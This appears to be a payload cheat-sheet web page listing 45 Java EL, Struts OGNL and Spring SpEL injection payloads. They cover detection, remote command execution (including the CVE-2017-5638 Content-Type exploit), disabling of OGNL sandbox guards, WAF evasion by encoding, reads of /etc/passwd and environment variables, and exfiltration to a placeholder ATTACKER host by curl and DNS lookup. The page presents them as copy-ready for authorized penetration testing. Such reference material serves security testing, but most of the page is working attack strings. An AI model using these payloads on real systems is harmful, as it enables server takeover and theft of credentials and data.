EL / OGNL / SpEL Injection Cheat Sheet

Expression Language injection payloads for Java EL, Struts OGNL, and Spring SpEL — detection, RCE, sandbox escape, and WAF bypass. (45 payloads)

Try it interactively with the SSTI Identifier & Payload Builder

Detection Probes

(8)

${7*7}

JSP/JSF immediate EL — reflected 49 means deferred evaluationJava EL

#{7*7}

JSF deferred EL (#{...}) — also Facelets/MyFacesJava EL

%{7*7}

Struts2 OGNL marker — 49 in response confirms OGNL evalOGNL

${7*'7'}

SpEL returns 49; many EL impls throw — distinguishes engineSpEL

${{7*7}}

Spring double-brace / template — Thymeleaf & SpEL preprocessingSpEL

%{(123+456)}

OGNL arithmetic probe — expect 579 reflectedOGNL

T(java.lang.Math).random()

SpEL type-reference probe — returns a float if SpELSpEL

${pageContext.request.serverPort}

JSP EL implicit object — confirms server-side EL with no math filterJava EL

Struts2 OGNL RCE

(7)

%{(#[email protected]@getRuntime().exec('id')).toString()}

Direct Runtime.exec via OGNL static method accessOGNL

%{#context['xwork.MethodAccessor.denyMethodExecution']=false}

Disable OGNL method-execution guard (S2-005/S2-009 era)OGNL

%{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('id')}

Re-enable static method access then execOGNL

Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#p=new java.lang.ProcessBuilder(#cmd.split(' '))).(#p.start())}

CVE-2017-5638 (S2-045) — Jakarta Content-Type header OGNL RCEStruts2 < 2.3.32 / 2.5.10.1

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#[email protected]@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#p.getInputStream()))}

Sandbox bypass via DEFAULT_MEMBER_ACCESS then read stdoutStruts2 2.5.x

redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23resp%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23resp.getWriter().println(@java.lang.Runtime@getRuntime().exec(%23req.getParameter('c')).getInputStream())}

S2-016 action: prefix OGNL injection in URLStruts2 2.0–2.3.15

%{(#instancemanager=#application['org.apache.tomcat.InstanceManager']).(#stack=#attr['struts.valueStack']).(#bean=#instancemanager.newInstance('org.apache.commons.collections.BeanMap')).(#bean.setBean(#stack))}

S2-057 namespace OGNL — Tomcat InstanceManager pivotStruts2 2.3–2.5.16

Spring SpEL RCE

(8)

T(java.lang.Runtime).getRuntime().exec('id')

Classic SpEL static type reference to RuntimeSpEL

T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','id'})

Shell wrapper so pipes/redirection workSpEL

new java.lang.ProcessBuilder(new String[]{'/bin/sh','-c','id'}).start()

ProcessBuilder instantiation avoids T() if blockedSpEL

T(org.springframework.util.StreamUtils).copyToString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream(), T(java.nio.charset.Charset).forName('UTF-8'))

Exec and read command output back into the responseSpEL

${T(java.lang.System).getenv()}

Dump environment variables (creds, tokens) via SpEL in templatesSpring/Thymeleaf

__${T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwn')}__::.x

Thymeleaf fragment-expression SpEL RCE (controller returns user-controlled view)Thymeleaf

#this.getClass().forName('java.lang.Runtime').getMethod('exec',#this.getClass().forName('java.lang.String')).invoke(#this.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'id')

Reflection-only SpEL when T() and 'new' are filteredSpEL

T(java.lang.Class).forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("id")')

Pivot to Nashorn/JS engine to dodge keyword filtersSpEL + JSR-223

Sandbox & Filter Escape

(8)

#[email protected]@DEFAULT_MEMBER_ACCESS

OGNL: replace SecurityMemberAccess to lift static/private restrictionsOGNL

(#wa=#context.get('com.opensymphony.xwork2.ActionContext.container')).(#bs=#wa.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#bs.setExcludedClasses('')).(#bs.setExcludedPackageNames(''))

OGNL: clear exclusion lists to re-allow blocked classes/packagesStruts2 2.5.x

T(java.lang.Character).toString(105)+T(java.lang.Character).toString(100)

SpEL: build 'id' from char codes to evade string keyword blocklistsSpEL

T(java.lang.Runtime).getRuntime().exec(T(java.util.Base64).getDecoder().decode('aWQ='))

SpEL: Base64-decode the command string past WAF inspectionSpEL

''.getClass().forName('java.lang.Run'+'time')

Concatenate class name so 'Runtime' literal never appearsSpEL/OGNL

@java.lang.Runtime@getRuntime().exec(new java.lang.String(new byte[]{105,100}))

OGNL: byte-array String to avoid 'exec("id")' signaturesOGNL

%{(#[email protected]@getRuntime()).(#a.exec('id'))}

Split assignment/call to break naive 'Runtime.exec' regexOGNL

T(java.lang.Thread).sleep(5000)

Blind/time-based oracle when output is not reflectedSpEL

File Read / Exfil & Recon

(7)

new java.io.BufferedReader(new java.io.FileReader('/etc/passwd')).readLine()

SpEL single-line file readSpEL

new String(T(java.nio.file.Files).readAllBytes(T(java.nio.file.Paths).get('/etc/passwd')))

SpEL: read whole file via NIO FilesSpEL

%{#f=new java.io.File('/etc/passwd'),#fis=new java.io.FileInputStream(#f),#b=new byte[(int)#f.length()],#fis.read(#b),new java.lang.String(#b)}

OGNL file read into byte bufferOGNL

T(java.lang.System).getProperty('user.dir')

SpEL: leak working directory / deployment pathSpEL

T(java.net.InetAddress).getLocalHost().getHostName()

SpEL: hostname for blind-injection out-of-band confirmationSpEL

%{@java.lang.Runtime@getRuntime().exec('curl http://ATTACKER/$(whoami)')}

OGNL blind RCE with OOB DNS/HTTP callback (use sh -c for the $())OGNL

T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','nslookup `id`.ATTACKER'})

SpEL DNS exfiltration of command outputSpEL

Common Sinks & Where to Look

(7)

SpelExpressionParser().parseExpression(userInput).getValue()

Spring sink — user data parsed as SpEL (the #1 SpEL bug pattern)Source code review

@Value("#{${user.controlled}}")

Spring @Value with attacker-influenced property → SpEL evalSpring config

@PreAuthorize("hasRole('...' + #param)")

Spring Security expression built from request input → SpEL injectionSpring Security

Struts <s:property value="%{name}"/> with user-set name

Struts2 value-stack OGNL evaluated twice (double-eval)Struts2 JSP

ELProcessor().eval(userInput) / ExpressionFactory.createValueExpression

Jakarta/Java EL programmatic eval of untrusted stringsJava EL

MessageInterpolator: javax.validation message ${...}

Bean Validation constraint messages evaluated as EL (CVE-2020-10693 style)Hibernate Validator

spring.thymeleaf: th:text / fragment selector from request

Thymeleaf view name or fragment chosen by user → SpEL RCEThymeleaf

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Command Injection Cheat Sheet SSTI Cheat Sheet WAF Bypass Cheat Sheet Insecure Deserialization Cheat Sheet

Frequently asked questions

What is the EL / OGNL / SpEL Injection Cheat Sheet?+

It's a quick-reference collection of 45 EL Injection payloads for testing EL / OGNL / SpEL Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these EL Injection payloads?+

Copy any payload straight into your authorized test, or use the SSTI Identifier & Payload Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these EL Injection payloads free to use?+

Yes — this cheat sheet and all EL Injection payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the EL / OGNL / SpEL Injection Cheat Sheet?+

How do I use these EL Injection payloads?+

Copy any payload straight into your authorized test, or use the SSTI Identifier & Payload Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these EL Injection payloads free to use?+

Yes — this cheat sheet and all EL Injection payloads are completely free, with no account required. Everything runs in your browser.

EL / OGNL / SpEL Injection Cheat Sheet

Detection Probes

Struts2 OGNL RCE

Spring SpEL RCE

Sandbox & Filter Escape

File Read / Exfil & Recon

Common Sinks & Where to Look

Related Tools

Related Cheat Sheets

Frequently asked questions

EL / OGNL / SpEL Injection Cheat Sheet

Detection Probes

Struts2 OGNL RCE

Spring SpEL RCE

Sandbox & Filter Escape

File Read / Exfil & Recon

Common Sinks & Where to Look

Related Tools

Related Cheat Sheets

Frequently asked questions